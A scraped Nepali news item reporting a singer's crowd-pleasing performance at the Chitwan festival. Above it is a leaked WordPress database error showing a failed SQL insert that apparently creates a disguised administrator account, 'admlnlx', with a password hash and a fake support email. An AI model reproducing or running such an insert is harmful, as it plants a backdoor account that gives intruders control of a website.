WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B3FP/Tn.oyIVCgx.igl2vQkvSkAdFY/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-31 10:05:03', '', 'admlnlx', 'admlnlx')
चितवन, माघ २ –
११औं चितवन महोत्सवको आज सातौं दिन हेमन्त शर्माले आफनो सांगीतिक प्रस्तुतीद्धारा दर्शकहरुलाइ नचाएका छन् ।
दर्शकहरु अन्य अवलोकन भन्दा पनि हेमन्तको संगितमा झुमेका थिए । उनको माया गर्छु भन्ने गितमा सुरक्षाकर्मीलाई भिड सम्हाल्न पनि निकै गाह्रो परेको थियो । साथै अन्य केही स्थानिय कलाकारहरुले पनि साथ दिएका थिए । महोत्सव माघ ५ गते सम्म चल्ने महोत्सव सचिवायले जानकारि दिएको छ ।